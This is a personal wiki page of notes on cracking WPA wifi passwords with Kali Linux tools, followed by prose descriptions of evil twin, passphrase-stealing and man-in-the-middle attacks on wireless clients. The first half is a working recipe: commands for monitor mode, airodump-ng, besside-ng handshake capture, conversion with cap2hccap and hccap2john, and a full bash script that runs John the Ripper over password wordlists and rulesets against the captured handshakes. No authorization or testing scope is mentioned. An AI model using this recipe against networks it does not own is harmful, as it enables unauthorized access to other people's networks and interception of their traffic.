Kali/Wireless Reboot
From charlesreid1
Reboot
Revisiting some of the old techniques.
Classic WPA Cracking
Monitor wireless
First is aircrack to monitor wifi networks.
Start by putting the wifi card in monitor mode:
$ ifconfig wlan1 down; iwconfig wlan1 mode monitor; ifconfig wlan1 up
Now you can use that interface to scan for wireless network activity:
$ airodump-ng -i wlan1 -w output_file
This will output information about wireless network activity to a file.
Obtain handshakes
You can use aircrack to monitor wireless activity and verify that there are, in fact, clients connected to networks - a critical component in obtaining handshakes. The next step is to use besside-ng to obtain handshakes the Joe Pesci way.
Specify -W for wpa only, and specify your network interface:
$ besside-ng -W wlan1
That will put handshakes in a cap file, and the name of networks whose handshakes were obtained in a log file.
Crack handshakes
Once we have the handshakes, use instructions on John the Ripper/WPA page to turn those cap files into hccap files, then into John the Ripper password files.
$ /root/codes/cap2hccap/cap2hccap.bin /root/box/08_besside/wpa.cap wpa.hccap $ hccap2john ./wpa.hccap > booty.johnpw
Now the goal is to crack booty.johnpw with John the Ripper. To do this, we will need to try a variety of wordlists, and a variety of rulesets to modify the words in the wordlists. To do that, use a bash script:
#!/bin/sh
# seclist passwords located in
# ~/codes/SecLists/Passwords
#
johndir="/usr/sbin"
johnbin="${johndir}/john"
cap="wpa.cap"
pwdir="/root/box/08_besside"
# Round 0
rulesets=("")
#### Round 1
###rulesets=("KoreLogicRulesAppendYears")
#### Round 2
###rulesets=("KoreLogicRulesAppendYears"
###"KoreLogicRulesAppendNum"
###"KoreLogicRulesPrependNum"
###"KoreLogicRulesAppendNumNum"
###"KoreLogicRulesPrependNumNum"
###"KoreLogicRulesPrependYears"
###)
# a good selection of seclist passwords:
# phpbb.txt
# elitehacker.txt
# alleged-gmail-passwords.txt
# Sucuri_Top_Wordpress_Passwords.txt
# korelogic-password.txt
# hak5.txt
# rockyou.txt
wordlists=("/root/codes/SecLists/Passwords/phpbb.txt"
"/root/codes/SecLists/Passwords/elitehacker.txt"
"/root/codes/SecLists/Passwords/alleged-gmail-passwords.txt"
"/root/codes/SecLists/Passwords/Sucuri_Top_Wordpress_Passwords.txt"
"/root/codes/SecLists/Passwords/korelogic-password.txt"
"/root/codes/SecLists/Passwords/hak5.txt"
"/root/codes/SecLists/Passwords/rockyou.txt")
# ===========================
# The Actual Work
for pwfile in `/bin/ls -1 ${pwdir}/*.johnpw`;
do
echo ""
echo ""
echo "*** * * ** **** * ***** ** ** * * * ** ****"
echo "* ** * *** **** *** * ** ** *** * * * *** *"
echo " * ***** * * * * *** * * * * * *** * * *"
echo "* * * * * * *** **** * *** * * * * * * *** *"
echo ""
echo ""
echo "Now on password file ${pwfile}"
echo ""
for rules in "${rulesets[@]}";
do
echo ""
echo ""
echo " .. . .. . .... ... . . ... .. . .. . . . ."
echo "... ... .. ...... . .. . . . .... .... ."
echo "... . .. . . . .. .... . . . . . ... . "
echo ""
echo ""
echo "Now on ruleset file ${rules}"
echo ""
for wordlist in "${wordlists[@]}";
do
echo ""
echo "---------------------------"
echo "Running John the Ripper with options:"
echo "Wordlist: ${wordlist}"
echo "Ruleset: ${rules}"
echo "Password File: ${pwfile}"
if [ "${rules}" == "" ] ; then
# test it out first
echo "${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}"
# actually do it
mypwd=`pwd`
cd ${johndir}
${johnbin} --wordlist=${wordlist} --format=wpapsk ${pwfile}
cd ${mypwd}
else
# test it out first
echo "${johnbin} --wordlist=${wordlist} --format=wpapsk --rules=${rules} ${pwfile}"
# actually do it
mypwd=`pwd`
cd ${johndir}
${johnbin} --rules=${rules} --wordlist=${wordlist} --format=wpapsk ${pwfile}
cd ${mypwd}
fi
done
done
done
|
Settle in, because we'll be here a while.
Alternatives to Cracking WPA
So you don't wanna rent out a GPU box, spend a week trimming your fingernails, and spending the entire time hoping that somehow, magically, you'll nail the one-in-a-bazillion-million chance you'll get it. That's understandable. Let's talk about alternative options. These are going to depend primarily on your target network and your scenario. For example, what kind of physical access to the primary wireless networking area do you have? What kind of antenna(s) are you using?
Client Attacks
Client attacks are essentially about tricking the client into connecting to you, and not the access point. These take advantage of the way wireless networks work to attack clients in various ways.
=Evil Twin Attack:
In the evil twin attack, the attacker utilizes information publicly broadcast by clients to trick the client into thinking it sees an access point it remembers - but it's actually an evil twin. This allows an attacker to hijack traffic going from the client to the (trusted, evil) access point.
Evil Twin MITM:
The evil twin attack may be done as part of a wireless man-in-the-middle attack. Imagine you see your home router, a hundred feet away, but actually it's an evil twin AP from the hacker who lives across the street using a cantenna. You think you are connecting to your own AP, but you're actually connecting to their evil AP. They connect their end to an internet connection, and voila, all of your traffic passes through their hardware.
Evil Twin Passphrase Pickpocket:
This may also be done to steal the passphrase of your remembered networks - a la Hak5 Pineapple - in which case, the conversation ends once the connection is initiated and the client sends over the (encrypted) Wifi password. The conversation goes something like this:
Sheep Client Device: Hello, attention everyone, I'm looking for "Linksys Home". Is anyone here "Linksys Home"?
(crickets)
Sheep Client Device: Hello, attention everyone, I'm looking for "Linksys Home". Is anyone here "Linksys Home"?
Evil Twin AP: (Listens for a bit)
Sheep Client Device: Hello, attention everyone, I'm looking for "Linksys Home". Is anyone here "Linksys Home"?
Evil Twin AP: (Puts on disguise) Well hello, yes, I am "Linksys Home." Over here. Yes, hello.
Sheep Client Device: Oh, wow! Boy am I glad I found you! I'm at the airport. You seem totally legit. Here's my wifi password. Can I check my email now?
Evil Twin AP: Thanks for the password. Let me validate it. I'll be right back... (Disappears)
This is possible because computers and phones are often set to "remember" wireless networks that are joined. What happens when your device remembers a wireless network is, it's added to a list of routers it remembers, and every time the wireless card is up and unconnected, it constantly broadcasts requests for those particular networks. This is convenient if you don't want to have to enter your username and password every time you want to log in to your home network, but it is also information that can be used against you.
Man in the Middle Attack:
A man-in-the-middle attack involves an attacker sitting between two parties, Alice and Bob, and forwarding all traffic from Alice along to Bob, and all traffic from Bob along to Alice, while also getting to read all of the traffic in the process.
Flags
 |
Wireless all things wireless.
Software:
|
|
aircrack-ng a suite of tools for wireless cracking.
aircrack-ng Many Ways to Crack a Wifi: Cracking Wifi Aircrack Benchmarking: Aircrack/Benchmarking WEP Attacks with Aircrack: Aircrack/WEP Cracking WPA Attacks with Aircrack: Aircrack/WPA Cracking Aircrack Hardware: Aircrack/Packet Injection Testing Harvesting Wireless Network Information
airodump-ng Basic Usage of Airodump
Category:Security · Category:Wireless · Category:Passwords
|